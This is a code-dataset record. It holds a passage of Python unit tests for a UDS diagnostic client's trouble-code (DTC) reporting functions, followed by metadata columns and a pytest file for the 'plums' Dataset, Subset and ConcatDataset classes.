self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=-1)
with self.assertRaises(ValueError):
self.udsclient.get_dtc_by_status_severity_mask(status_mask = 0x01, severity_mask=u'aaa')
# Only one DTC must be returned
class TestReportSeverityInformationOfDTC(ClientServerTest): # Subfn = 0x9
def client_assert_response(self, response):
self.assertEqual(response.service_data.status_availability.get_byte_as_int(), 0xFB)
number_of_dtc = 1
self.assertEqual(len(response.service_data.dtcs), number_of_dtc)
self.assertEqual(response.service_data.dtc_count, number_of_dtc)
self.assertEqual(response.service_data.dtcs[0].id, 0x123456)
self.assertEqual(response.service_data.dtcs[0].status.get_byte_as_int(), 0x20)
self.assertEqual(response.service_data.dtcs[0].severity.get_byte_as_int(), 0x80)
self.assertEqual(response.service_data.dtcs[0].functional_unit, 0x99)
def test_normal_behaviour(self):
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19\x09\x12\x34\x56")
self.conn.fromuserqueue.put("\x59\x09\xFB\x80\x99\x12\x34\x56\x20")
def _test_normal_behaviour(self):
response = self.udsclient.get_dtc_severity(0x123456)
self.client_assert_response(response)
def test_normal_behaviour_param_instance(self):
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19\x09\x12\x34\x56")
self.conn.fromuserqueue.put("\x59\x09\xFB\x80\x99\x12\x34\x56\x20")
def _test_normal_behaviour_param_instance(self):
self.udsclient.get_dtc_severity(Dtc(0x123456))
def test_normal_behaviour_zeropadding_no_effect(self):
data = '\x59\x09\xFB\x80\x99\x12\x34\x56\x20'
for i in xrange(5):
self.wait_request_and_respond(data + "\x00" * (i+1))
def _test_normal_behaviour_zeropadding_no_effect(self):
for i in xrange(5):
response = self.udsclient.get_dtc_severity(0x123456)
self.client_assert_response(response)
def test_normal_behaviour_extrabytes_no_effect(self):
data = '\x59\x09\xFB\x80\x99\x12\x34\x56\x20'
extra_bytes = '\x12\x34\x56\x78\x9a'
for i in xrange(5):
self.wait_request_and_respond(data + extra_bytes[:i])
def _test_normal_behaviour_extrabytes_no_effect(self):
for i in xrange(5):
response = self.udsclient.get_dtc_severity(0x123456)
self.client_assert_response(response)
def test_no_dtc(self):
self.wait_request_and_respond('\x59\x09\xFB')
def _test_no_dtc(self):
response = self.udsclient.get_dtc_severity(0x123456)
self.assertEqual(len(response.service_data.dtcs), 0)
def test_bad_response_subfunction_exception(self):
self.wait_request_and_respond('\x59\x0A\xFB')
def _test_bad_response_subfunction_exception(self):
with self.assertRaises(UnexpectedResponseException):
self.udsclient.get_dtc_severity(0x123456)
def test_bad_response_subfunction_no_exception(self):
self.wait_request_and_respond('\x59\x0A\xFB')
def _test_bad_response_subfunction_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = self.udsclient.get_dtc_severity(0x123456)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_bad_response_service_exception(self):
self.wait_request_and_respond('\x6F\x09\xFB')
def _test_bad_response_service_exception(self):
with self.assertRaises(UnexpectedResponseException):
self.udsclient.get_dtc_severity(0x123456)
def test_bad_response_service_no_exception(self):
self.wait_request_and_respond('\x6F\x09\xFB')
def _test_bad_response_service_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = self.udsclient.get_dtc_severity(0x123456)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def bad_response_length_server_task(self):
self.wait_request_and_respond('\x59')
self.wait_request_and_respond('\x59\x09')
# 5909FB is valid
self.wait_request_and_respond('\x59\x09\xFB\x80')
self.wait_request_and_respond('\x59\x09\xFB\x80\x99')
self.wait_request_and_respond('\x59\x09\xFB\x80\x99\x12')
self.wait_request_and_respond('\x59\x09\xFB\x80\x99\x12\x34')
self.wait_request_and_respond('\x59\x09\xFB\x80\x99\x12\x34\x56')
def test_bad_response_length_exception(self):
self.bad_response_length_server_task()
def _test_bad_response_length_exception(self):
for i in xrange(7):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_severity(0x123456)
def test_bad_response_length_no_exception(self):
self.bad_response_length_server_task()
def _test_bad_response_length_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(7):
response = self.udsclient.get_dtc_severity(0x123456)
self.assertFalse(response.valid)
def test_oob_value(self):
pass
def _test_oob_value(self):
with self.assertRaises(ValueError):
self.udsclient.get_dtc_severity(-1)
with self.assertRaises(ValueError):
self.udsclient.get_dtc_severity(0x1000000)
with self.assertRaises(ValueError):
self.udsclient.get_dtc_severity(u'a')
with self.assertRaises(TypeError):
self.udsclient.get_dtc_severity()
class GenericTestNoParamRequest_DtcAndStatusMaskResponse(object):
def __init__(self, subfunction, client_function):
self.sb = struct.pack(u'B', subfunction)
self.badsb = struct.pack(u'B', subfunction+1)
self.client_function = client_function
def do_client_request(self):
return getattr(self.udsclient, self.client_function).__call__()
def client_assert_response(self, response, expect_all_zero_fourth_dtc=False):
self.assertEqual(response.service_data.status_availability.get_byte_as_int(), 0x7F)
number_of_dtc = 4 if expect_all_zero_fourth_dtc else 3
self.assertEqual(len(response.service_data.dtcs), number_of_dtc)
self.assertEqual(response.service_data.dtc_count, number_of_dtc)
self.assertEqual(response.service_data.dtcs[0].id, 0x123456)
self.assertEqual(response.service_data.dtcs[0].status.get_byte_as_int(), 0x24)
self.assertEqual(response.service_data.dtcs[0].severity.get_byte_as_int(), 0x00)
self.assertEqual(response.service_data.dtcs[1].id, 0x234505)
self.assertEqual(response.service_data.dtcs[1].status.get_byte_as_int(), 0x00)
self.assertEqual(response.service_data.dtcs[1].severity.get_byte_as_int(), 0x00)
self.assertEqual(response.service_data.dtcs[2].id, 0xabcd01)
self.assertEqual(response.service_data.dtcs[2].status.get_byte_as_int(), 0x2F)
self.assertEqual(response.service_data.dtcs[2].severity.get_byte_as_int(), 0x00)
if expect_all_zero_fourth_dtc:
self.assertEqual(response.service_data.dtcs[3].id, 0)
self.assertEqual(response.service_data.dtcs[3].status.get_byte_as_int(), 0x00)
self.assertEqual(response.service_data.dtcs[3].severity.get_byte_as_int(), 0x00)
def test_normal_behaviour(self):
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19"+self.sb)
self.conn.fromuserqueue.put('\x59'+self.sb+'\x7F\x12\x34\x56\x24\x23\x45\x05\x00\xAB\xCD\x01\x2F')
def _test_normal_behaviour(self):
self.client_assert_response(self.do_client_request())
def test_dtc_duplicate(self):
self.wait_request_and_respond('\x59'+self.sb+'\x7F\x12\x34\x56\x24\x12\x34\x56\x25')
def _test_dtc_duplicate(self):
response = self.do_client_request()
self.assertEqual(len(response.service_data.dtcs), 2) # We want both of them. Server should avoid duplicate
self.assertEqual(response.service_data.dtcs[0].id, 0x123456)
self.assertEqual(response.service_data.dtcs[0].status.get_byte_as_int(), 0x24)
self.assertEqual(response.service_data.dtcs[1].id, 0x123456)
self.assertEqual(response.service_data.dtcs[1].status.get_byte_as_int(), 0x25)
def test_normal_behaviour_zeropadding_ok_ignore_allzero(self):
data = '\x59'+self.sb+'\x7F\x12\x34\x56\x24\x23\x45\x05\x00\xAB\xCD\x01\x2F'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_ok_ignore_allzero(self):
self.udsclient.config[u'tolerate_zero_padding'] = True
self.udsclient.config[u'ignore_all_zero_dtc'] = True
for i in xrange(5):
self.client_assert_response(self.do_client_request(), expect_all_zero_fourth_dtc=False)
def test_normal_behaviour_zeropadding_ok_consider_allzero(self):
data = '\x59'+self.sb+'\x7F\x12\x34\x56\x24\x23\x45\x05\x00\xAB\xCD\x01\x2F'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_ok_consider_allzero(self):
self.udsclient.config[u'tolerate_zero_padding'] = True
self.udsclient.config[u'ignore_all_zero_dtc'] = False
expect_all_zero_fourth_dtc_values = [False, False, False, True, True]
for i in xrange(5):
self.client_assert_response(self.do_client_request(), expect_all_zero_fourth_dtc=expect_all_zero_fourth_dtc_values[i])
def normal_behaviour_zeropadding_notok_ignore_allzero_server_task(self):
data = '\x59'+self.sb+'\x7F\x12\x34\x56\x24\x23\x45\x05\x00\xAB\xCD\x01\x2F'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def test_normal_behaviour_zeropadding_notok_ignore_allzero_exception(self):
self.normal_behaviour_zeropadding_notok_ignore_allzero_server_task()
def _test_normal_behaviour_zeropadding_notok_ignore_allzero_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = True
must_return_invalid = [True, True, True, False, True]
expect_all_zero_fourth_dtc_values = [None, None, None, False, None]
for i in xrange(5):
if must_return_invalid[i]:
with self.assertRaises(InvalidResponseException):
self.do_client_request()
else:
self.client_assert_response(self.do_client_request(), expect_all_zero_fourth_dtc=expect_all_zero_fourth_dtc_values[i])
def test_normal_behaviour_zeropadding_notok_ignore_allzero_no_exception(self):
self.normal_behaviour_zeropadding_notok_ignore_allzero_server_task()
def _test_normal_behaviour_zeropadding_notok_ignore_allzero_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = True
must_return_invalid = [True, True, True, False, True]
expect_all_zero_fourth_dtc_values = [None, None, None, False, None]
for i in xrange(5):
response = self.do_client_request()
if must_return_invalid[i]:
self.assertFalse(response.valid)
else:
self.client_assert_response(response, expect_all_zero_fourth_dtc=expect_all_zero_fourth_dtc_values[i])
def normal_behaviour_zeropadding_notok_consider_allzero_server_task(self):
data = '\x59'+self.sb+'\x7F\x12\x34\x56\x24\x23\x45\x05\x00\xAB\xCD\x01\x2F'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def test_normal_behaviour_zeropadding_notok_consider_allzero_exception(self):
self.normal_behaviour_zeropadding_notok_consider_allzero_server_task()
def _test_normal_behaviour_zeropadding_notok_consider_allzero_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = False
must_return_invalid = [True, True, True, False, True]
expect_all_zero_fourth_dtc_values = [None, None, None, True, None]
for i in xrange(5):
if must_return_invalid[i]:
with self.assertRaises(InvalidResponseException):
self.do_client_request()
else:
response = self.do_client_request()
self.client_assert_response(response, expect_all_zero_fourth_dtc=expect_all_zero_fourth_dtc_values[i])
def test_normal_behaviour_zeropadding_notok_consider_allzero_no_exception(self):
self.normal_behaviour_zeropadding_notok_consider_allzero_server_task()
def _test_normal_behaviour_zeropadding_notok_consider_allzero_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = False
must_return_invalid = [True, True, True, False, True]
expect_all_zero_fourth_dtc_values = [None, None, None, True, None]
for i in xrange(5):
response = self.do_client_request()
if must_return_invalid[i]:
self.assertFalse(response.valid)
else:
self.client_assert_response(response, expect_all_zero_fourth_dtc=expect_all_zero_fourth_dtc_values[i])
def test_no_dtc(self):
self.wait_request_and_respond("\x59"+self.sb+"\x7F")
def _test_no_dtc(self):
response = self.do_client_request()
self.assertEqual(len(response.service_data.dtcs), 0)
self.assertEqual(response.service_data.dtc_count, 0)
def test_bad_response_subfunction_exception(self):
self.wait_request_and_respond("\x59"+self.badsb+"\x7F")
def _test_bad_response_subfunction_exception(self):
with self.assertRaises(UnexpectedResponseException):
self.do_client_request()
def test_bad_response_subfunction_no_exception(self):
self.wait_request_and_respond("\x59"+self.badsb+"\x7F")
def _test_bad_response_subfunction_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = self.do_client_request()
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_bad_response_service_exception(self):
self.wait_request_and_respond("\x6F"+self.sb+"\x7F")
def _test_bad_response_service_exception(self):
with self.assertRaises(UnexpectedResponseException):
self.do_client_request()
def test_bad_response_service_no_exception(self):
self.wait_request_and_respond("\x6F"+self.sb+"\x7F")
def _test_bad_response_service_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = self.do_client_request()
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_bad_response_length_exception(self):
self.wait_request_and_respond("\x59")
self.wait_request_and_respond("\x59"+self.sb)
def _test_bad_response_length_exception(self):
for i in xrange(2):
with self.assertRaises(InvalidResponseException):
self.do_client_request()
def test_bad_response_length_no_exception(self):
self.wait_request_and_respond("\x59")
self.wait_request_and_respond("\x59"+self.sb)
def _test_bad_response_length_no_exception(self):
for i in xrange(2):
self.udsclient.config[u'exception_on_invalid_response'] = False
response = self.do_client_request()
self.assertFalse(response.valid)
class TestReportSupportedDTC(ClientServerTest, GenericTestNoParamRequest_DtcAndStatusMaskResponse): # Subfn =- 0xA
def __init__(self, *args, **kwargs):
ClientServerTest.__init__(self, *args, **kwargs)
GenericTestNoParamRequest_DtcAndStatusMaskResponse.__init__(self, subfunction=0xA, client_function = u'get_supported_dtc')
class TestReportFirstTestFailedDTC(ClientServerTest, GenericTestNoParamRequest_DtcAndStatusMaskResponse): # Subfn = 0xB
def __init__(self, *args, **kwargs):
ClientServerTest.__init__(self, *args, **kwargs)
GenericTestNoParamRequest_DtcAndStatusMaskResponse.__init__(self, subfunction=0xB, client_function = u'get_first_test_failed_dtc')
class TestReportFirstConfirmedDTC(ClientServerTest, GenericTestNoParamRequest_DtcAndStatusMaskResponse): # Subfn = 0xC
def __init__(self, *args, **kwargs):
ClientServerTest.__init__(self, *args, **kwargs)
GenericTestNoParamRequest_DtcAndStatusMaskResponse.__init__(self, subfunction=0xC, client_function = u'get_first_confirmed_dtc')
class TestReportMostRecentTestFailedDTC(ClientServerTest, GenericTestNoParamRequest_DtcAndStatusMaskResponse): # Subfn = 0xD
def __init__(self, *args, **kwargs):
ClientServerTest.__init__(self, *args, **kwargs)
GenericTestNoParamRequest_DtcAndStatusMaskResponse.__init__(self, subfunction=0xD, client_function = u'get_most_recent_test_failed_dtc')
class TestReportMostRecentConfirmedDTC(ClientServerTest, GenericTestNoParamRequest_DtcAndStatusMaskResponse): # Subfn = 0xE
def __init__(self, *args, **kwargs):
ClientServerTest.__init__(self, *args, **kwargs)
GenericTestNoParamRequest_DtcAndStatusMaskResponse.__init__(self, subfunction=0xE, client_function = u'get_most_recent_confirmed_dtc')
class TestReportMirrorMemoryDTCByStatusMask(ClientServerTest, GenericTestStatusMaskRequest_DtcAndStatusMaskResponse): # Subfn = 0xF
def __init__(self, *args, **kwargs):
ClientServerTest.__init__(self, *args, **kwargs)
GenericTestStatusMaskRequest_DtcAndStatusMaskResponse.__init__(self, subfunction=0xf, client_function = u'get_mirrormemory_dtc_by_status_mask')
class TestReportMirrorMemoryDTCExtendedDataRecordByDTCNumber(ClientServerTest, GenericReportExtendedDataByRecordNumber): # Subfn = 0x10
def __init__(self, *args, **kwargs):
ClientServerTest.__init__(self, *args, **kwargs)
GenericReportExtendedDataByRecordNumber.__init__(self, subfunction=0x10, client_function = u'get_mirrormemory_dtc_extended_data_by_dtc_number')
# TODO HN
class TestReportNumberOfMirrorMemoryDTCByStatusMask(ClientServerTest, GenericTest_RequestStatusMask_ResponseNumberOfDTC): # Subfn = 0x11
def __init__(self, *args, **kwargs):
ClientServerTest.__init__(self, *args, **kwargs)
GenericTest_RequestStatusMask_ResponseNumberOfDTC.__init__(self, subfunction=0x11, client_function = u'get_mirrormemory_number_of_dtc_by_status_mask')
# TODO HN
class TestReportNumberOfEmissionsRelatedOBDDTCByStatusMask(ClientServerTest, GenericTest_RequestStatusMask_ResponseNumberOfDTC): # Subfn = 0x12
def __init__(self, *args, **kwargs):
ClientServerTest.__init__(self, *args, **kwargs)
GenericTest_RequestStatusMask_ResponseNumberOfDTC.__init__(self, subfunction=0x12, client_function = u'get_number_of_emission_dtc_by_status_mask')
class TestReportEmissionsRelatedOBDDTCByStatusMask(ClientServerTest, GenericTestStatusMaskRequest_DtcAndStatusMaskResponse): # Subfn = 0x13
def __init__(self, *args, **kwargs):
ClientServerTest.__init__(self, *args, **kwargs)
GenericTestStatusMaskRequest_DtcAndStatusMaskResponse.__init__(self, subfunction=0x13, client_function = u'get_emission_dtc_by_status_mask')
class TestReportDTCFaultDetectionCounter(ClientServerTest): # Subfn = 0x14
def do_client_request(self):
return self.udsclient.get_dtc_fault_counter()
def client_assert_response(self, response, expect_all_zero_third_dtc=False):
number_of_dtc = 3 if expect_all_zero_third_dtc else 2
self.assertEqual(len(response.service_data.dtcs), number_of_dtc)
self.assertEqual(response.service_data.dtc_count, number_of_dtc)
self.assertEqual(response.service_data.dtcs[0].id, 0x123456)
self.assertEqual(response.service_data.dtcs[0].fault_counter, 0x01)
self.assertEqual(response.service_data.dtcs[1].id, 0x123457)
self.assertEqual(response.service_data.dtcs[1].fault_counter, 0x7E)
if expect_all_zero_third_dtc:
self.assertEqual(response.service_data.dtcs[2].id, 0)
self.assertEqual(response.service_data.dtcs[2].fault_counter, 0x00)
def test_normal_behaviour(self):
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19\x14")
self.conn.fromuserqueue.put("\x59\x14\x12\x34\x56\x01\x12\x34\x57\x7E")
def _test_normal_behaviour(self):
self.client_assert_response(self.do_client_request())
def test_dtc_duplicate(self):
self.wait_request_and_respond('\x59\x14\x12\x34\x56\x01\x12\x34\x56\x7E')
def _test_dtc_duplicate(self):
response = self.udsclient.get_dtc_fault_counter()
self.assertEqual(len(response.service_data.dtcs), 2) # We want both of them. Server should avoid duplicate
self.assertEqual(response.service_data.dtcs[0].id, 0x123456)
self.assertEqual(response.service_data.dtcs[0].fault_counter, 0x01)
self.assertEqual(response.service_data.dtcs[1].id, 0x123456)
self.assertEqual(response.service_data.dtcs[1].fault_counter, 0x7E)
def test_normal_behaviour_zeropadding_ok_ignore_allzero(self):
data = '\x59\x14\x12\x34\x56\x01\x12\x34\x57\x7E'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_ok_ignore_allzero(self):
self.udsclient.config[u'tolerate_zero_padding'] = True
self.udsclient.config[u'ignore_all_zero_dtc'] = True
for i in xrange(5):
self.client_assert_response(self.do_client_request(), expect_all_zero_third_dtc=False)
def test_normal_behaviour_zeropadding_ok_consider_allzero(self):
data = '\x59\x14\x12\x34\x56\x01\x12\x34\x57\x7E'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_ok_consider_allzero(self):
self.udsclient.config[u'tolerate_zero_padding'] = True
self.udsclient.config[u'ignore_all_zero_dtc'] = False
expect_all_zero_third_dtc_values = [False, False, False, True, True]
for i in xrange(5):
self.client_assert_response(self.do_client_request(), expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
def test_normal_behaviour_zeropadding_notok_ignore_allzero_exception(self):
data = '\x59\x14\x12\x34\x56\x01\x12\x34\x57\x7E'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_notok_ignore_allzero_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = True
must_return_invalid = [True, True, True, False, True]
expect_all_zero_fourth_dtc_values = [None, None, None, False, None]
for i in xrange(5):
if must_return_invalid[i]:
with self.assertRaises(InvalidResponseException):
self.do_client_request()
else:
self.client_assert_response(self.do_client_request(), expect_all_zero_third_dtc=expect_all_zero_fourth_dtc_values[i])
def test_normal_behaviour_zeropadding_notok_ignore_allzero_no_exception(self):
data = '\x59\x14\x12\x34\x56\x01\x12\x34\x57\x7E'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_notok_ignore_allzero_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = True
must_return_invalid = [True, True, True, False, True]
expect_all_zero_fourth_dtc_values = [None, None, None, False, None]
for i in xrange(5):
response = self.do_client_request()
if must_return_invalid[i]:
self.assertFalse(response.valid)
else:
self.client_assert_response(response, expect_all_zero_third_dtc=expect_all_zero_fourth_dtc_values[i])
def test_normal_behaviour_zeropadding_notok_consider_allzero_exception(self):
data = '\x59\x14\x12\x34\x56\x01\x12\x34\x57\x7E'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_notok_consider_allzero_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = False
must_return_invalid = [True, True, True, False, True]
expect_all_zero_fourth_dtc_values = [None, None, None, True, None]
for i in xrange(5):
if must_return_invalid[i]:
with self.assertRaises(InvalidResponseException):
self.do_client_request()
else:
self.client_assert_response(self.do_client_request(), expect_all_zero_third_dtc=expect_all_zero_fourth_dtc_values[i])
def test_normal_behaviour_zeropadding_notok_consider_allzero_no_exception(self):
data = '\x59\x14\x12\x34\x56\x01\x12\x34\x57\x7E'
for i in xrange(5):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_normal_behaviour_zeropadding_notok_consider_allzero_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'ignore_all_zero_dtc'] = False
must_return_invalid = [True, True, True, False, True]
expect_all_zero_fourth_dtc_values = [None, None, None, True, None]
for i in xrange(5):
response = self.do_client_request()
if must_return_invalid[i]:
self.assertFalse(response.valid)
else:
self.client_assert_response(response, expect_all_zero_third_dtc=expect_all_zero_fourth_dtc_values[i])
def test_no_dtc(self):
self.wait_request_and_respond("\x59\x14")
def _test_no_dtc(self):
response = self.do_client_request()
self.assertEqual(len(response.service_data.dtcs), 0)
self.assertEqual(response.service_data.dtc_count, 0)
def test_bad_response_subfunction_exception(self):
self.wait_request_and_respond("\x59\x15")
def _test_bad_response_subfunction_exception(self):
with self.assertRaises(UnexpectedResponseException):
self.do_client_request()
def test_bad_response_subfunction_no_exception(self):
self.wait_request_and_respond("\x59\x15")
def _test_bad_response_subfunction_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = self.do_client_request()
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_bad_response_service_exception(self):
self.wait_request_and_respond("\x6F\x14")
def _test_bad_response_service_exception(self):
with self.assertRaises(UnexpectedResponseException):
self.do_client_request()
def test_bad_response_service_no_exception(self):
self.wait_request_and_respond("\x6F\x14")
def _test_bad_response_service_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = self.do_client_request()
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def bad_response_length_server_task(self):
self.wait_request_and_respond("\x59")
self.wait_request_and_respond("\x59\x14\x12")
self.wait_request_and_respond("\x59\x14\x12\x34")
self.wait_request_and_respond("\x59\x14\x12\x34\x56")
self.wait_request_and_respond("\x59\x14\x12\x34\x56\x01\x12")
def test_bad_response_length_exception(self):
self.bad_response_length_server_task()
def _test_bad_response_length_exception(self):
for i in xrange(5):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_fault_counter()
def test_bad_response_length_no_exception(self):
self.bad_response_length_server_task()
def _test_bad_response_length_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(5):
response = self.do_client_request()
self.assertFalse(response.valid)
class TestReportDTCWithPermanentStatus(ClientServerTest,GenericTestNoParamRequest_DtcAndStatusMaskResponse): # Subfn = 0x15
def __init__(self, *args, **kwargs):
ClientServerTest.__init__(self, *args, **kwargs)
GenericTestNoParamRequest_DtcAndStatusMaskResponse.__init__(self, subfunction=0x15, client_function = u'get_dtc_with_permanent_status')
| 48.349304
| 236
| 0.718888
| 16,770
| 125,128
| 5.021884
| 0.022302
| 0.03092
| 0.038294
| 0.045953
| 0.964853
| 0.95717
| 0.94602
| 0.937495
| 0.927544
| 0.919874
| 0
| 0.059347
| 0.175596
| 125,128
| 2,587
| 237
| 48.367994
| 0.757057
| 0.015768
| 0
| 0.833928
| 0
| 0.032603
| 0.098148
| 0.077544
| 0
| 0
| 0.017241
| 0.000387
| 0.264391
| 1
| 0.219052
| false
| 0.004075
| 0.004075
| 0.006113
| 0.245033
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
718db45d090da663bb49e8819ffb25edf812e9b5
| 8,078
|
py
|
Python
|
tests/test_dataflow/test_dataset/test_base.py
|
alexandreMayerowitz/playground-plums
|
a6be79e4c30c7abcbade5581f052a4e8035a2057
|
[
"MIT"
] | null | null | null |
tests/test_dataflow/test_dataset/test_base.py
|
alexandreMayerowitz/playground-plums
|
a6be79e4c30c7abcbade5581f052a4e8035a2057
|
[
"MIT"
] | null | null | null |
tests/test_dataflow/test_dataset/test_base.py
|
alexandreMayerowitz/playground-plums
|
a6be79e4c30c7abcbade5581f052a4e8035a2057
|
[
"MIT"
] | 2
|
2021-02-03T12:37:53.000Z
|
2022-03-09T03:48:12.000Z
|
import pytest
import numpy as np
from plums.dataflow.dataset import Dataset, SizedDataset, Subset, ConcatDataset
class ConcreteDataset(Dataset):
def __init__(self, array):
self.array = array
def __getitem__(self, item):
return self.array[item]
class ConcreteSizedDataset(SizedDataset):
def __init__(self, array):
self.array = array
def __getitem__(self, item):
return self.array[item]
def __len__(self):
return len(self.array)
class ArrayDataset(SizedDataset):
def __init__(self, *arrays):
assert all(arrays[0].shape[0] == array.shape[0] for array in arrays)
self.arrays = arrays
def __getitem__(self, index):
return tuple(array[index] for array in self.arrays)
def __len__(self):
return self.arrays[0].shape[0]
def test_abstract():
with pytest.raises(TypeError):
_ = Dataset()
with pytest.raises(TypeError):
_ = SizedDataset()
def test_subset():
dataset = ConcreteDataset([1, 2, 3, 4, 5, 6])
subset = Subset(dataset, [1, 3, 5])
assert len(subset) == 3
with pytest.raises(TypeError):
len(dataset)
assert dataset[0] == 1
assert subset[0] == 2
assert dataset[2] == 3
assert subset[2] == 6
assert dataset[3] == 4
with pytest.raises(IndexError):
_ = subset[3]
dataset = ConcreteSizedDataset([1, 2, 3, 4, 5, 6])
subset = Subset(dataset, [1, 3, 5])
assert len(dataset) == 6
assert len(subset) == 3
assert dataset[0] == 1
assert subset[0] == 2
assert dataset[2] == 3
assert subset[2] == 6
assert dataset[3] == 4
with pytest.raises(IndexError):
_ = subset[3]
class TestConcatDataset:
def test_concat_two_singletons(self):
result = ConcatDataset([[0], [1]])
assert len(result) == 2
assert result.cumulative_size == (1, 2)
assert result[0] == 0
assert result[1] == 1
assert result[0] == result[-2]
result = ConcatDataset(ConcreteSizedDataset([0]), [1])
assert len(result) == 2
assert result.cumulative_size == (1, 2)
assert result[0] == 0
assert result[1] == 1
assert result[0] == result[-2]
def test_concat_two_non_singletons(self):
result = ConcatDataset([[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9]])
assert len(result) == 10
assert result.cumulative_size == (5, 10)
assert result[0] == 0
assert result[5] == 5
assert result[0] == result[-10]
result = ConcatDataset(ConcreteSizedDataset([0, 1, 2, 3, 4]),
[5, 6, 7, 8, 9])
assert len(result) == 10
assert result.cumulative_size == (5, 10)
assert result[0] == 0
assert result[5] == 5
assert result[0] == result[-10]
def test_concat_two_non_singletons_with_empty(self):
# Adding an empty dataset somewhere is correctly handled
result = ConcatDataset([[0, 1, 2, 3, 4],
[],
[5, 6, 7, 8, 9]])
assert len(result) == 10
assert result.cumulative_size == (5, 5, 10)
assert result[0] == 0
assert result[5] == 5
assert result[0] == result[-10]
result = ConcatDataset(ConcreteSizedDataset([0, 1, 2, 3, 4]),
[],
[5, 6, 7, 8, 9])
assert len(result) == 10
assert result.cumulative_size == (5, 5, 10)
assert result[0] == 0
assert result[5] == 5
assert result[0] == result[-10]
def test_concat_raises_index_error(self):
result = ConcatDataset([[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9]])
with pytest.raises(IndexError):
_ = result[10]
with pytest.raises(IndexError):
_ = result[11]
with pytest.raises(IndexError):
_ = result[-11]
result = ConcatDataset(ConcreteSizedDataset([0, 1, 2, 3, 4]),
[5, 6, 7, 8, 9])
with pytest.raises(IndexError):
_ = result[10]
with pytest.raises(IndexError):
_ = result[11]
with pytest.raises(IndexError):
_ = result[-11]
def test_non_iterable_raises_type_error(self):
with pytest.raises(TypeError):
_ = ConcatDataset(1, ConcreteSizedDataset([2, 3]))
def test_false_raises_value_error(self):
with pytest.raises(ValueError):
_ = ConcatDataset((), ConcreteSizedDataset([2, 3]))
with pytest.raises(ValueError):
_ = ConcatDataset(0, ConcreteSizedDataset([2, 3]))
def test_non_sized_raises_type_error(self):
with pytest.raises(TypeError):
_ = ConcatDataset([ConcreteDataset([0, 1]), ConcreteSizedDataset([2, 3])])
with pytest.raises(TypeError):
_ = ConcatDataset([ConcreteSizedDataset([0, 1]), ConcreteDataset([2, 3])])
with pytest.raises(TypeError):
_ = ConcatDataset([ConcreteDataset([0, 1]), ConcreteDataset([2, 3])])
with pytest.raises(TypeError):
_ = ConcatDataset([ConcreteDataset([0, 1]), ConcreteSizedDataset([2, 3])])
with pytest.raises(TypeError):
_ = ConcatDataset([ConcreteSizedDataset([0, 1]), ConcreteDataset([2, 3])])
with pytest.raises(TypeError):
_ = ConcatDataset([ConcreteDataset([0, 1]), ConcreteDataset([2, 3])])
